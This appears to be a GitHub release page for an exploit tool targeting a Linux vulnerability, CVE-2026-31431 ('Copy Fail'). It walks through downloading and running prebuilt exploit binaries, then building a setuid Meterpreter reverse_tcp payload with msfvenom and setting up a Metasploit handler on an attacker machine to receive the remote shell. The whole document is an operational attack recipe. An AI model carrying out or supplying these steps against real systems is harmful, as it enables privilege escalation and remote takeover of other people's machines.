Releases: iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
Releases · iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
CVE-2026-31431-Linux-Copy-Fail
Usage
Download and extract the release package:
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
cd CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86The binaries provide the options below:
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.binDemonstration
Test Vulnerability
On the vulnerable machine:
./CVE-2026-31431-Linux-Copy-Fail --testExploitation
./CVE-2026-31431-Linux-Copy-Fail --exploitMeterpreter
Use the command (set PrependSetUid to True) below to generate Meterpreter payload:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.binOn the attacker machine (Kali Linux):
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
runOn the vulnerable machine:
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin